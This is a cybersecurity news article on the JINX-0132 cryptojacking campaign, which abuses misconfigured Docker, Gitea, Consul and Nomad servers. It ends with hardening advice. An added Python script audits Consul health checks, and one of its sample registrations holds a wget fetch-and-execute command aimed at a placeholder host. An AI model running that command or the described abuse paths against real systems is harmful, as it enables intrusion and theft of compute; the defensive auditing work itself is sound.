Cryptojacking Campaign Exploits Misconfigured DevOps Tools

Cybersecurity researchers from cloud security firm Wiz have uncovered a new cryptojacking campaign, JINX-0132, that targets misconfigured and publicly accessible DevOps web servers.

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

Cybersecurity researchers from cloud security firm Wiz have uncovered a new cryptojacking campaign, JINX-0132, that targets misconfigured and publicly accessible DevOps web servers. The campaign leverages platforms such as Docker, Gitea, HashiCorp Consul, and Nomad to illicitly mine cryptocurrency, primarily Monero (XMR), using the popular XMRig miner.

The campaign is notable for both its scale and its tactics, exploiting known misconfigurations and vulnerabilities across commonly used DevOps tools.

A First for HashiCorp Nomad Exploits

In what is believed to be the first publicly documented case of its kind, the attackers have been observed exploiting misconfigured HashiCorp Nomad servers in the wild. Nomad is a workload orchestrator for deploying applications on virtual machines and containers, widely used in modern infrastructure stacks.

By compromising Nomad instances that manage hundreds of connected clients, the attackers are gaining access to significant CPU and RAM resources. According to Wiz, the amount of computing power hijacked in this campaign would cost tens of thousands of dollars per month if obtained through legitimate cloud services.

Technical Attack Pathways

1. Docker API Exploitation

Exposed Docker APIs have long been a target for cryptojacking campaigns. In JINX-0132, attackers use publicly exposed Docker API endpoints such as /containers/create and /containers/{id}/start to:

  • Spin up malicious containers

  • Mount the host file system

  • Download and execute cryptocurrency mining images

This technique enables remote code execution with minimal user interaction.

2. Gitea Remote Code Execution

Gitea, a lightweight Git repository hosting solution, is vulnerable to RCE under certain conditions:

  • If the INSTALL_LOCK configuration is left as false

  • If an attacker gains access to a user account that can create git hooks

  • If the server is running Gitea version 1.4.0, which contains known vulnerabilities

The attackers use these avenues to upload and run malicious scripts, creating a persistent foothold in the system.

3. HashiCorp Consul Service Registration Abuse

If not secured properly, Consul allows remote users to register new services and attach health checks to them. These health checks can include bash commands, which the Consul agent executes automatically on the host.

JINX-0132 abuses this feature to register services with malicious health checks, effectively turning the server into a cryptocurrency miner.

4. Nomad Job Scheduling Misuse

In its default configuration, Nomad’s server API is not secured, meaning anyone with access can create and run new jobs. The attackers use this to:

  • Schedule jobs with malicious commands

  • Download XMRig miners directly from GitHub

  • Execute them on all connected Nomad clients

By hosting payloads on GitHub, the attackers avoid using suspicious or traceable infrastructure, complicating attribution efforts.

Global Exposure

According to Shodan data:

  • Over 5,300 Consul servers and 400 Nomad servers are publicly exposed

  • Top affected regions include China, the United States, Germany, Singapore, Finland, the Netherlands, and the UK

These exposures highlight the global scope of the risk and the need for better DevOps security practices.

Recommendations

1. Secure APIs and Services

  • Lock down Docker, Gitea, Nomad, and Consul APIs to trusted IPs only

  • Apply authentication mechanisms and access control lists (ACLs)

2. Patch and Update

  • Ensure all DevOps tools are running the latest versions

  • Apply relevant patches for vulnerabilities such as CVE-2020-14144

3. Audit Configurations

  • Set INSTALL_LOCK=true in Gitea

  • Remove unused or insecure default configurations in Nomad and Consul

  • Disable anonymous service registration in Consul
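The Consul health-check abuse described under "HashiCorp Consul Service Registration Abuse" and the audit step above can be checked mechanically: every script-based health check in a service registration is a command the agent will run on the host. The following is an added example, not code from the article or from Wiz; it reads the service-registration JSON shape Consul accepts and flags script checks, and the sample registrations (including the example.invalid URL) are constructed.

```python
"""Audit Consul service registrations for script-based health checks.

A script check runs its command on the agent host on every interval, so any
registration that carries one is an execution path worth a second look. The
input is the JSON shape sent to /v1/agent/service/register, which is also the
shape under the "service" key in files in the agent's config directory.
"""
import json
import re

# Any of these fields turns a check into a command executed on the agent.
SCRIPT_FIELDS = ("Args", "Script", "Shell", "DockerContainerID")
# Commands that fetch something from the network are rated higher.
REMOTE_RE = re.compile(r"https?://|\bcurl\b|\bwget\b", re.IGNORECASE)

def script_checks(registration: dict) -> list[dict]:
    """Return the script checks declared by one service registration."""
    checks = list(registration.get("Checks", []))
    if "Check" in registration:          # single-check form
        checks.append(registration["Check"])
    return [c for c in checks if any(f in c for f in SCRIPT_FIELDS)]

def audit_registration(registration: dict) -> list[dict]:
    """Produce one finding per script check, rated by what the command does."""
    findings = []
    for check in script_checks(registration):
        cmd = " ".join(check.get("Args") or [check.get("Script", "")])
        severity = "high" if REMOTE_RE.search(cmd) else "medium"
        findings.append({"service": registration.get("Name", "?"),
                         "severity": severity, "command": cmd})
    return findings

# Constructed sample registrations (not data from the Wiz report).
SAMPLES = [
    {"Name": "web", "Port": 8080,
     "Check": {"HTTP": "http://localhost:8080/health", "Interval": "10s"}},
    {"Name": "disk",
     "Check": {"Args": ["/usr/local/bin/check_disk.sh"], "Interval": "30s"}},
    {"Name": "updater",
     "Checks": [{"TCP": "localhost:9000", "Interval": "10s"},
                {"Args": ["/bin/sh", "-c",
                          "wget -q https://example.invalid/x -O /tmp/x && /tmp/x"],
                 "Interval": "5s"}]},
]

def audit_all(registrations=SAMPLES) -> list[dict]:
    """Flatten findings across all registrations; HTTP/TCP checks produce none."""
    return [f for r in registrations for f in audit_registration(r)]

if __name__ == "__main__":
    for finding in audit_all():
        print(json.dumps(finding))
```

Running it against the agent's config directory, or against the output of a registration review, lists only the checks that execute commands; with `enable_script_checks` left at its default of false, a Consul agent rejects such registrations outright.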

4. Monitor Network Traffic

  • Track outbound traffic to mining pools, or to GitHub URLs not associated with legitimate development activity

  • Investigate unusual CPU or memory usage across DevOps infrastructure

Conclusion

The JINX-0132 campaign is a stark reminder that misconfigured infrastructure can be as dangerous as unpatched vulnerabilities. As attackers increasingly exploit automation platforms and orchestration tools, DevOps and security teams must work together to harden configurations, monitor environments, and respond rapidly to suspicious activity.

Maintaining good cyber hygiene is not just about protecting code—it's about safeguarding the infrastructure that delivers it.